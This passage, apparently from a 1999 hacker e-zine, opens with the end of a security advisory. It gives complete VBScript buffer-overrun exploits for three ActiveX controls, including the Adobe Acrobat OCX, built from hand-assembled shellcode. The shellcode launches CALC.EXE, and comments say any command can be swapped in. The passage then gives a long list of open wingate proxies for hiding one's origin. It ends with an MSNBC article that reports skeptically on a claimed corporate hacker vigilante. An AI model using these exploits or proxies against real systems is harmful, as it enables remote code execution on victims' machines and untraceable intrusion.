AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'RET address (ExitProcess BFF8D4CA)
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191)
'This buffer overrun can be triggered by either method.
'setupbbs.vAddNewsServer expstr, true
setupbbs.bIsNewsServerConfigured expstr
--></script>
============================================================
PDF
This control from Adobe Acrobat, can be exploited through
the setview method, and because ESP points to the address
after the RET address, we can place arbitrary code at this
point and JMP to it by RET'ing to a JMP ESP, in this case,
one found in Shell32. The code simply executes CALC.EXE
then calls ExitProcess to terminate the host without it
crashing. I have attempted to notify Adobe of the issue,
however they don't appear to have any form of direct
secure@ address.
<object classid="clsid:CA8A9780-280D-11CF-A24D-444553540000"
id="pdf"></object>
<script language="VBscript"><!--
msgbox("Adobe Acrobat OCX Buffer Overrun" + Chr(10)
+ "Written by Shane Hird")
expstr
= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA"
expstr = expstr + Chr(235) 'Address in SHELL32, Win98
(7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a
different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'Stack is slightly trashed, but NOPs fix it up ok
expstr = expstr + Chr(144) + Chr(144) + Chr(144) + Chr(144)
+ Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 1)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) +
Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248)
+ Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Call exploitable method
pdf.setview(expstr)
--></script>
============================================================
SETUPCTL
Apparently a control that was once used for the IE update
web site which is no longer in use, although it should
still exist on a lot of systems. With this exploit, similar
to the PDF exploit, ESP points to our code so we simply RET
to the same JMP ESP in Shell32. Also, this exploit differs
in that we set a property first (DistUnit) with the long
string, then call the method (InstallNow). Again, I have
simply demonstrated how to execute CALC.EXE, though any
code can be executed.
<object classid="clsid:F72A7B0E-0DD8-11D1-BD6E-
00AA00B92AF1" id = "setupctl">
</object>
<script language="vbscript"><!--
msgbox("Setupctl 1.0 Type Library Buffer Overrun" + Chr(10)
+ "Written by Shane Hird")
expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA"
expstr = expstr + Chr(235) 'Address in SHELL32, Win98
(7FD035EB) of JMP ESP
expstr = expstr + Chr(53) 'You may need to use a
different address
expstr = expstr + Chr(208)
expstr = expstr + Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19h (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) +
Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248)
+ Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
'Run exploit
setupctl.DistUnit = expstr
setupctl.InstallNow
--></script>
============================================================
REGWIZC
The Registration Wizard control used by Microsoft to
register MS products also contains a buffer overrun in
the 'InvokeRegWizard' method. When called with a long
string, pre-pended with '/i', we can gain control of the
RET address and exploit the control in a similar manner as
the PDF control. This exploit will cause a 'Regwiz.log'
file to be created in the temporary directory, and once
again will execute CALC.EXE and terminate the host.
<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-
00A0249F6B00" id="RegWizObj">
</object>
<script language="VbScript" ><!--
msgbox("Registration Wizard Buffer Overrun" + Chr(10)
+ "Written by Shane Hird")
expstr = "/i
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32
expstr = expstr & Chr(235) 'Address in SHELL32, Win98
(7FD035EB) of JMP ESP
expstr = expstr & Chr(53) 'You may need to use a
different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
'NOP for debugging purposes
expstr = expstr + Chr(144)
'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)
'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)
'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)
'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) +
Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)
'PUSH EAX
expstr = expstr + Chr(80)
'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248)
+ Chr(191)
'CALL EDX
expstr = expstr + Chr(255) + Chr(210)
'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"
RegWizObj.InvokeRegWizard(expstr)
--></script>
============================================================
Sorry for the length of this advisory, but as there are
several exploits, and probably many more, it was necessary.
It should be noted, that not only MS ActiveX controls are
susceptible, but also many other vendors controls. I cannot
possibly go through all the controls which are available to
the public, but the controls which are installed by default
on most systems are obviously the most serious.
-Shane Hird <s.hird@student.qut.edu.au>
First year IT student at QUT, Brisbane, Australia.
Sponsors?
18.0 CyberArmy: Wingates list
~~~~~~~~~~~~~~~~~~~~~~~~
Some are bad, some are good, some are undoubtably phishes or traps, buyer beware. These
are posted here as always with no strings, they come from a third party and are posted in
order for you to make sure YOU aren't on this list!
209.112.31.34 [latency: 10/01/99 16:14:15 PDT by sandoc]
210.169.139.161 [latency: 10/01/99 16:12:44 PDT by sandoc]
207.107.88.21 [latency: 10/01/99 15:29:03 PDT by sandoc]
212.174.65.76 [latency: 10/01/99 14:52:38 PDT by sandoc]
ss06.co.us.ibm.com [latency: 10/01/99 14:49:32 PDT by sandoc]
o u mind...if i fuck u? [latency: 10/01/99 13:00:20 PDT by Ivan Dimitrov]
198.247.215.1 [latency: 09/30/99 15:02:12 PDT]
mh.gymnaziumtu.cz [latency: 09/30/99 13:21:22 PDT by sandoc]
210.114.231.130 [latency: 09/30/99 13:18:59 PDT by sandoc]
210.56.18.225 [latency: 09/30/99 13:16:33 PDT by sandoc]
pen22755-1.gw.connect.com.au [latency: 09/30/99 13:14:19 PDT by sandoc]
cix.abaco.edu.pe [latency: 09/30/99 13:09:37 PDT by sandoc]
note.ark.ne.jp [latency: 09/30/99 13:07:40 PDT by sandoc]
208.5.13.15 [latency: 09/30/99 13:05:23 PDT by sandoc]
203.135.2.188 [latency: 09/30/99 13:01:51 PDT by sandoc]
193.227.185.190 [latency: 09/30/99 12:59:35 PDT by sandoc]
194.204.205.127 [latency: 09/30/99 12:58:22 PDT by sandoc]
193.227.181.144 [latency: 09/30/99 12:55:20 PDT by sandoc]
200.230.120.133 [latency: 09/30/99 12:53:51 PDT by sandoc]
194.75.255.156 [latency: 09/29/99 10:19:20 PDT by sandoc]
infou429.jet.es [latency: 09/29/99 10:18:13 PDT by sandoc]
212.252.66.206 [latency: 09/29/99 10:16:50 PDT by sandoc]
203.197.208.36 [latency: 09/29/99 10:15:07 PDT by sandoc]
216.226.197.179 [latency: 09/29/99 10:05:53 PDT by sandoc]
chaus.ozemail.com.au [latency: 09/29/99 10:04:12 PDT by sandoc]
maodcfm.egat.or.th [latency: 09/29/99 10:01:24 PDT by sandoc]
200.46.20.185 [latency: 09/29/99 09:56:02 PDT by sandoc]
195.249.229.4 [latency: 09/29/99 09:53:20 PDT by sandoc]
sscoin.com [latency: 09/29/99 09:47:10 PDT by sandoc]
proxy.cyberg.it [latency: 09/29/99 08:46:47 PDT by aaa]
195.182.171.121 [latency: 09/29/99 05:27:51 PDT by Bi0Sk|lleR]
whois.internic.net [latency: 09/28/99 10:57:58 PDT]
200.42.146.150 [latency: 09/28/99 10:03:10 PDT by sandoc]
203.197.9.162 [latency: 09/28/99 09:56:20 PDT by sandoc]
mail.tbccorp.com [latency: 09/28/99 09:54:59 PDT by sandoc]
MF2-1-036.mgfairfax.rr.com [latency: 09/28/99 09:48:25 PDT by sandoc]
195.146.98.226 [latency: 09/28/99 09:34:37 PDT by sandoc]
202.186.134.6 [latency: 09/28/99 04:30:26 PDT by B Wang]
207.139.234.203 [latency: 09/27/99 20:54:19 PDT by monster]
radna-gw.supermedia.pl [latency: 09/27/99 20:30:25 PDT]
DONT.WRITE. BULLSHIT.HERE [latency: 09/27/99 19:22:09 PDT by abed]
209.21.14.65 [latency: 09/27/99 13:40:26 PDT by sandoc]
192.117.8.253 [latency: 09/27/99 13:38:27 PDT by sandoc]
192.106.117.25 [latency: 09/27/99 13:35:07 PDT by sandoc]
212.68.152.3 [latency: 09/27/99 13:33:46 PDT by sandoc]
194.73.125.69 [latency: 09/27/99 13:29:42 PDT by sandoc]
sie-home-1-7.urbanet.ch [latency: 09/27/99 13:09:32 PDT by sandoc]
neptune.sunlink.net [latency: 09/27/99 08:51:15 PDT by Juxtaposition]
24.1.3.125 [latency: 09/27/99 08:32:57 PDT by Juxtaposition]
24.1.4.116 [latency: 09/27/99 08:31:56 PDT by Juxtaposition]
sherlock.ibi.co.za [latency: 09/26/99 15:44:34 PDT by Juxtaposition]
207.50.228.163 [latency: 09/26/99 10:19:37 PDT by sandoc]
193.15.241.21 [latency: 09/26/99 10:10:53 PDT by sandoc]
194.25.204.29 [latency: 09/26/99 10:09:24 PDT by sandoc]
207.229.47.11 [latency: 09/26/99 10:08:00 PDT by sandoc]
205.237.210.214 [latency: 09/26/99 10:06:38 PDT by sandoc]
c30-169.the-bridge.net [latency: 09/26/99 09:59:18 PDT by sandoc]
38.30.155.88 [latency: 09/25/99 21:17:05 PDT by Jame]
152.169.201.156 [latency: 09/25/99 20:23:48 PDT]
24.112.84.102 [latency: 09/25/99 13:11:04 PDT by BLaZeR u Newbie!]
24.112.84.94 [latency: 09/25/99 13:10:23 PDT by BLaZeR u NeWb! H]
mail.trikotazas.lt [latency: 09/25/99 12:08:31 PDT by babysuk]
209.183.86.96 [latency: 09/25/99 11:11:55 PDT by Shogo]
206.103.12.131 [latency: 09/25/99 10:41:41 PDT by sandoc]
proxy01.faboro.ch [latency: 09/25/99 10:36:49 PDT by sandoc]
pc1.expansion.com.mx [latency: 09/25/99 10:36:06 PDT by sandoc]
207.3.122.85 [latency: 09/25/99 10:33:38 PDT by sandoc]
radna-gw.supermedia.pl [latency: 09/25/99 10:29:52 PDT by sandoc]
202.135.160.10 [latency: 09/25/99 10:28:57 PDT by sandoc]
gateway.eltjanst.se [latency: 09/25/99 10:26:13 PDT by sandoc]
ns.holonic.co.jp [latency: 09/25/99 10:24:57 PDT by sandoc]
203.101.1.22 [latency: 09/25/99 10:23:18 PDT by sandoc]
163.121.200.72 [latency: 09/25/99 10:13:01 PDT]
195.216.48.13 [latency: 09/25/99 06:42:29 PDT]
24.112.84.93 [latency: 09/24/99 23:50:43 PDT by U R DEAD ZASZ U FAG]
24.112.97.9 [latency: 09/24/99 23:39:29 PDT by BLaZeR]
210.237.183.226 [latency: 09/24/99 20:55:02 PDT by ~TG|{~ZaSz]
200.210.15.188 [latency: 09/24/99 20:54:40 PDT by ZaSz]
24.226.156.214 [latency: 09/24/99 20:54:20 PDT by ZaSz]
202.21.8.31 [latency: 09/24/99 20:54:07 PDT by ZaSz]
202.21.8.21 [latency: 09/24/99 20:53:54 PDT by ~TG|{~ZaSz]
200.210.15.166 [latency: 09/24/99 20:53:34 PDT by ZaSz]
139.142.170.233 [latency: 09/24/99 20:53:22 PDT by ZaSz]
24.30.53.10 [latency: 09/24/99 20:53:10 PDT by ZaSz]
24.30.109.224 [latency: 09/24/99 20:52:44 PDT by ZaSz]
24.0.233.86 [latency: 09/24/99 20:52:34 PDT by ZaSz]
200.255.107.140 [latency: 09/24/99 20:52:11 PDT by ZaSz]
200.36.8.103 [latency: 09/24/99 20:51:56 PDT by ZaSz]
200.38.211.242 [latency: 09/24/99 20:51:42 PDT by ZaSz]
200.38.211.253 [latency: 09/24/99 20:51:24 PDT by ZaSz]
200.38.211.246 [latency: 09/24/99 20:51:10 PDT by ZaSz]
210.169.139.161 [latency: 09/24/99 20:50:59 PDT by ZaSz]
210.226.69.210 [latency: 09/24/99 20:50:48 PDT by ZaSz]
209.251.71.115 [latency: 09/24/99 20:50:30 PDT by ZaSz]
24.0.79.151 [latency: 09/24/99 20:50:18 PDT by ZaSz]
24.0.79.40 [latency: 09/24/99 20:50:05 PDT by ZaSz]
24.4.27.2 [latency: 09/24/99 20:49:49 PDT by ZaSz]
207.102.5.161 [latency: 09/24/99 20:49:36 PDT by ZaSz]
207.102.5.162 [latency: 09/24/99 20:49:21 PDT by ZaSz]
210.164.86.34 [latency: 09/24/99 20:49:06 PDT by ZaSz]
195.67.1.34 [latency: 09/24/99 20:48:12 PDT by ZaSz]
195.216.48.36 [latency: 09/24/99 20:47:54 PDT by ZaSz]
195.216.48.30 [latency: 09/24/99 20:47:41 PDT by ZaSz]
195.216.48.13 [latency: 09/24/99 20:47:24 PDT by ZaSz]
210.226.82.162 [latency: 09/24/99 20:47:06 PDT by ZaSz]
200.13.19.218 [latency: 09/24/99 20:46:51 PDT by ZaSz]
200.13.19.213 [latency: 09/24/99 20:46:36 PDT by ZaSz]
200.13.19.181 [latency: 09/24/99 20:46:21 PDT by ZaSz]
200.13.19.141 [latency: 09/24/99 20:46:08 PDT by ZaSz]
200.13.19.76 [latency: 09/24/99 20:45:55 PDT by ZaSz]
200.13.19.33 [latency: 09/24/99 20:45:43 PDT by ~TG|{~ZaSz]
195.182.171.121 [latency: 09/24/99 20:45:21 PDT by ZaSz]
24.112.39.232 [latency: 09/24/99 20:43:14 PDT by ZaSz]
24.2.29.54 [latency: 09/24/99 20:41:41 PDT by ZaSz]
24.112.75.210 [latency: 09/24/99 20:41:30 PDT by ZaSz]
24.112.7.143 [latency: 09/24/99 20:41:18 PDT by ZaSz]
24.93.15.248 [latency: 09/24/99 20:41:05 PDT by ZaSz]
24.64.210.14 [latency: 09/24/99 20:40:52 PDT by ZaSz]
24.112.167.186 [latency: 09/24/99 20:40:36 PDT by ZaSz]
203.102.199.109 [latency: 09/24/99 20:40:13 PDT by ZaSz]
210.161.200.82 [latency: 09/24/99 20:39:55 PDT by ZaSz]
207.102.5.162 [latency: 09/24/99 20:39:42 PDT by ZaSz]
207.102.5.161 [latency: 09/24/99 20:39:26 PDT by ZaSz]
203.102.199.209 [latency: 09/24/99 20:39:15 PDT by ZaSz]
203.102.199.186 [latency: 09/24/99 20:39:02 PDT by ZaSz]
203.102.199.72 [latency: 09/24/99 20:38:51 PDT by ZaSz]
203.102.199.21 [latency: 09/24/99 20:38:40 PDT by ZaSz]
203.102.199.22 [latency: 09/24/99 20:38:16 PDT by ZaSz]
203.102.199.11 [latency: 09/24/99 20:38:03 PDT by ZaSz]
209.165.135.138 [latency: 09/24/99 20:37:53 PDT by ZaSz]
216.72.47.33 [latency: 09/24/99 20:37:36 PDT by ZaSz]
216.72.47.18 [latency: 09/24/99 20:37:23 PDT by ZaSz]
216.72.47.16 [latency: 09/24/99 20:37:08 PDT by ZaSz]
216.72.47.12 [latency: 09/24/99 20:36:51 PDT by ~TG|{~ZaSz = ZaSz]
216.72.47.8 [latency: 09/24/99 20:36:14 PDT by ZaSz]
216.72.47.4 [latency: 09/24/99 20:36:01 PDT by ZaSz]
209.4.68.50 [latency: 09/24/99 20:35:44 PDT by ZaSz]
200.38.211.253 [latency: 09/24/99 20:35:32 PDT by ZaSz]
200.38.211.251 [latency: 09/24/99 20:35:08 PDT by ZaSz]
200.38.211.240 [latency: 09/24/99 20:34:49 PDT by ZaSz]
200.38.211.226 [latency: 09/24/99 20:34:37 PDT by ZaSz]
200.38.211.239 [latency: 09/24/99 20:34:18 PDT by ZaSz]
209.144.19.86 [latency: 09/24/99 20:34:05 PDT by ZaSz]
206.141.48.2 [latency: 09/24/99 20:33:53 PDT by ZaSz]
24.93.51.131 [latency: 09/24/99 20:33:33 PDT by ~TG|{~ZaSz]
irc.dm.net.lb [latency: 09/24/99 14:22:40 PDT by Devil]
DONT.WRITE. BULLSHIT.HERE [latency: 09/24/99 14:18:49 PDT by Devil]
156-21.dr.cgocable.ca [latency: 09/24/99 14:14:50 PDT by Devil]
209.198.248.139 [latency: 09/24/99 14:12:11 PDT by Devil]
hs.state.az.us [latency: 09/24/99 14:11:23 PDT by Devil]
207.225.232.5 [latency: 09/24/99 13:18:41 PDT by sandoc]
212.252.147.144 [latency: 09/24/99 13:14:59 PDT by sandoc]
195.87.12.110 [latency: 09/24/99 13:04:21 PDT by sandoc]
195.14.129.129 [latency: 09/24/99 13:01:58 PDT by sandoc]
193.192.109.139 [latency: 09/24/99 13:00:46 PDT by sandoc]
194.204.240.157 [latency: 09/24/99 12:58:33 PDT by sandoc]
212.252.15.80 [latency: 09/24/99 12:54:30 PDT by sandoc]
212.252.149.99 [latency: 09/24/99 12:52:36 PDT by sandoc]
ar5-120i.dial-up.arnes.si [latency: 09/24/99 12:50:01 PDT by sandoc]
cuscon1658.tstt.net.tt [latency: 09/24/99 12:48:49 PDT by sandoc]
host029210.ciudad.com.ar [latency: 09/24/99 12:46:36 PDT by sandoc]
202.213.244.234 [latency: 09/24/99 12:40:07 PDT by sandoc]
asy26.as01.sol1.superonline.com [latency: 09/24/99 12:34:37 PDT by sandoc]
207.158.108.99 [latency: 09/24/99 12:32:59 PDT by sandoc]
212.33.193.146 [latency: 09/24/99 12:30:45 PDT by sandoc]
cableweb.w3.to [latency: 09/23/99 20:03:23 PDT]
ppp-15-78.cyberia.net.lb [latency: 09/23/99 13:43:06 PDT by sandoc]
flammen.aof.no [latency: 09/23/99 13:41:38 PDT by sandoc]
eta.riosoft.softex.br [latency: 09/23/99 13:40:05 PDT by sandoc]
Pelican.CITY.UniSA.edu.au [latency: 09/23/99 13:37:07 PDT by sandoc]
server1.wingsink.com [latency: 09/23/99 13:34:13 PDT by sandoc]
mail.jgboswell.com [latency: 09/23/99 13:32:42 PDT by sandoc]
210.136.60.2 [latency: 09/23/99 13:31:36 PDT by sandoc]
210.145.140.245 [latency: 09/23/99 13:30:02 PDT by sandoc]
dc.com.pl [latency: 09/23/99 13:27:43 PDT by sandoc]
Tuva-Tcms17.krs.ru [latency: 09/23/99 13:26:13 PDT by sandoc]
impexcabmet.LL.sl.ru [latency: 09/23/99 13:24:09 PDT by sandoc]
proxy.cyberg.it [latency: 09/23/99 13:15:29 PDT by sandoc]
194.79.101.94 [latency: 09/23/99 13:13:27 PDT by sandoc]
ns.bibliodata.net [latency: 09/23/99 13:11:38 PDT by sandoc]
194.213.239.19 [latency: 09/23/99 13:06:55 PDT by sandoc]
server.tf.ITB.ac.id [late
ncy: 09/23/99 13:04:38 PDT by sandoc]
212.133.139.3 [latency: 09/23/99 12:56:08 PDT by sandoc]
207.3.122.85 [latency: 09/23/99 12:54:12 PDT by sandoc]
210.237.183.226 [latency: 09/23/99 12:52:56 PDT by sandoc]
dciserver.twfrierson.com [latency: 09/23/99 12:51:52 PDT by sandoc]
as3-54.gto.net.om [latency: 09/23/99 12:48:46 PDT by sandoc]
tirith.mngt.waikato.ac.nz [latency: 09/23/99 12:46:50 PDT by sandoc]
ABD708E3.ipt.aol.com [latency: 09/23/99 12:45:24 PDT by sandoc]
sil.am [latency: 09/23/99 11:40:39 PDT by [0uTw0rLd]]
hs.state.az.us [latency: 09/22/99 20:34:48 PDT]
141.216.41.247 [latency: 09/22/99 11:38:31 PDT]
195.182.171.121 [latency: 09/22/99 07:17:12 PDT by N1C]
chat.groovy.gr [latency: 09/21/99 13:46:58 PDT by aqile]
24.137.18.44 [latency: 09/21/99 13:44:00 PDT]
195.122.112.11 [latency: 09/21/99 12:39:54 PDT by bebhlos]
cableweb.w3.to [latency: 09/21/99 03:59:56 PDT]
208.184.64.1 [latency: 09/20/99 16:14:28 PDT]
202.21.8.21 [latency: 09/20/99 10:43:21 PDT]
yes...i do mind [latency: 09/20/99 10:17:07 PDT by b33sh]
202.21.8.21 [latency: 09/20/99 09:13:42 PDT]
do u mind...if i fuck u? [latency: 09/20/99 06:42:48 PDT]
202.21.8.171 [latency: 09/19/99 22:12:08 PDT by 0ct4g0n0]
200.210.15.178 [latency: 09/19/99 04:32:31 PDT by SeA^g|R|_]
proxy.amtvl.com [latency: 09/19/99 03:15:31 PDT]
ns.devp.org [latency: 09/19/99 03:12:16 PDT]
Hacker.Com [latency: 09/19/99 03:11:08 PDT]
205.230.60.56 [latency: 09/18/99 19:32:00 PDT by #OP - DALnet - DIE]
T.O.O.H_Inc. [latency: 09/18/99 16:30:29 PDT]
203.243.123.14 [latency: 09/18/99 14:48:57 PDT by SeA^g|R|_]
207.242.80.66 [latency: 09/18/99 08:06:36 PDT by #SocketS/MSNr3db|00d]
207.236.55.231 [latency: 09/18/99 07:59:41 PDT by r3db|00d]
206.132.179.167 [latency: 09/18/99 07:20:02 PDT by SeA^g|R|_]
thunder.jpl.nasa.gov [latency: 09/18/99 02:59:45 PDT by ThUnDeR]
24.226.156.21 [latency: 09/17/99 06:54:23 PDT by kamel]
Telezimex.ro [latency: 09/16/99 23:46:52 PDT by Kamel]
rs.internic.net [latency: 09/16/99 14:13:22 PDT by Kick DALnet Ass!!!]
202.21.8.21 [latency: 09/15/99 23:35:14 PDT by turbobeaver]
is.theshit.and.your.a.lammah.com [latency: 09/15/99 07:48:20 PDT by dEm0nL|T|0niSt]
DAL.net.is.owned. [latency: 09/15/99 07:07:05 PDT by Anakin]
ts1-32.gcc.cyberhighway.net [latency: 09/14/99 10:33:37 PDT by pit]
dns.yoshinomasa.co.jp [latency: 09/14/99 10:30:04 PDT by Wolfen]
P62.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 10:28:36 PDT by kusa]
P59.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 00:01:34 PDT]
ts1-32.gcc.cyberhighway.net [latency: 09/13/99 23:59:02 PDT]
200.210.15.178 [latency: 09/13/99 23:58:03 PDT]
@HWA
19.0 Internet Vigilantism A story so fantastic it just might be true...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by cult_hero
Lou Cipher discusses his experiences of confiscating
computer equipment and B&E all without a warrant. This
information security 'professional' claims to have tracked
cyber intruders to their homes and then paid them an
unannounced visit complete with baseball bat. Claiming
that 'self defense' is the only option available to him and
the companies he works for Lou Cipher brazenly takes
the law into his own hands with little regard for the
consequences.
HNN has serious doubts about the validity of these
claims. We would like to hear from anyone who has
been the target for any such illegal home invasion.
MSNBC - Bob Sullivan on September 28, 1999
http://www.msnbc.com/news/311611.asp
CNN - Original Story by Winn Schwartau on January 12,1999
http://cnn.com/TECH/computing/9901/12/cybervigilantes.idg/index.html
MSNBC;
Vigilante justice in cyberspace
When companies want swift action against hackers, they dont
always call the law
By Bob Sullivan
MSNBC
Sept. 27 Youre a bank, and you think someone is trying to hack into your
computer system. Where do you turn? Law enforcement offers little help
agencies are overworked and understaffed, and you risk public embarrassment
if word gets out. Apparently, theres another option. You might decide to take
the law into your own hands. Which means you might call a man known as Lou
Cipher. Lou says hes spent the last 10 years working for Fortune 500 companies,
turning the tables on computer intruders, performing what some have called vigilante
justice in cyberspace.
CIPHER, A PSEUDONYM of his own choosing, says
he retired from a 15-year career as a computer consultant in 1990. By then, he had
already started his life as a hacker for hire.
In the past 10 years, hes says hes been hired over 50 times by big U.S. firms mostly
financial institutions looking to get hackers off their back. He says fees now start
at $100,000 for new clients, with no promises of success.
He and his associates often take on their tasks by bridging from the virtual world to
the physical. That means breaking into the same computers a hacker has hijacked,
chasing the trail through cyberspace, obtaining a real-world address and paying a
real-life visit. Cipher says hes even broken into homes and stolen hackers computers
to teach them a lesson. He gives the machines back after recovering any stolen
information I am engaged in the protection and regaining of stolen assets because of the
inability of government to provide adequate protection and prosecution, Cipher says. And
that includes, he admits, breaking laws himself. His defense: Its self-defense. You can
call the FBI right now and say a person just got off with a database of customers. What
is the FBI going to do?
The increase in technology crime has given fits to law enforcement agencies who find they
dont have the necessary skills to keep up with an army of new criminals, emboldened by the
anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost
six months for the recent nationwide FBI hacker crackdown to produce an arrest.
So Cipher, and some say other such corporate vigilantes, take the law into their own hands.
Still, to call breaking into someone elses home an act of corporate self-defense would likely
be considered a stretch in court.
I dont see that argument holding water, said cyberlaw expert Dorsey Morrow. It would be a
dangerous thing for a corporation to do. The potential liability is incredible.Particularly
if vigilantes hit the wrong target. Thats the concern of computer consultant Brian Martin,
who maintains the popular hacker information site attrition.org.
So Lou and his gang roll up on this house and know the intruder dialed from there. They bust
in and terrorize an elderly couple. Oops! Martin said. How could they have been so wrong? Because
the hacker used a laptop from the phone box outside their house. That scenario scares me.
Cipher was first identified in public when information warfare expert Winn Schwartau used his
name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred
skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News
Network Web site, say theyve ever heard of a hacker being visited by any private security agent.
Is disarming an adversary illegal? ... Youre allowed to do repossession, which is stealing
your own possessions back. - WINN SCHWARTAU
Considering the size of this community, if he has visited more than 10 people I am sure word would
have leaked, Rogue said. But he added There have been rumors floating around for a few years of
corporations with their own internal security taking matters into their own hands.
That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy,
special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon
conference earlier this month. I have no problem with identifying a bad guy and warning them,
said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special
Investigations. Thats a legitimate self-defense option for a victim. But it crosses the line
when you violate the rights of others. ... It crosses the line when you break the law.
He said the key to making law enforcement agencies more effective is for more victims of computer
crime to come forward. Without a backlog of cases, agents cant demand additional resources.
Companies that hire vigilantes, or who simply brush computer crime under the rug out of
fear of embarrassment, only make the situation worse, he said.
But that wont help victims today, Schwartau said, and they need somewhere to turn.the legal
community says its blatantly illegal, Schwartau said. Schwartau, who once shared ownership of a
Web site venture with Cipher, says the legal community is being closed-minded on the topic. Is
disarming an adversary illegal? ... Youre allowed to do repossession, which is stealing your own
possessions back.
When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a
large U.S. brokerage company, Cipher said he painstakingly verfies his targets and admits sometimes
he doesnt catch them. Most of the examples he offered involved pre-emptive strikes against
hackers probing financial networks the cyber equivalent of casing a bank before a robbery.
Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one
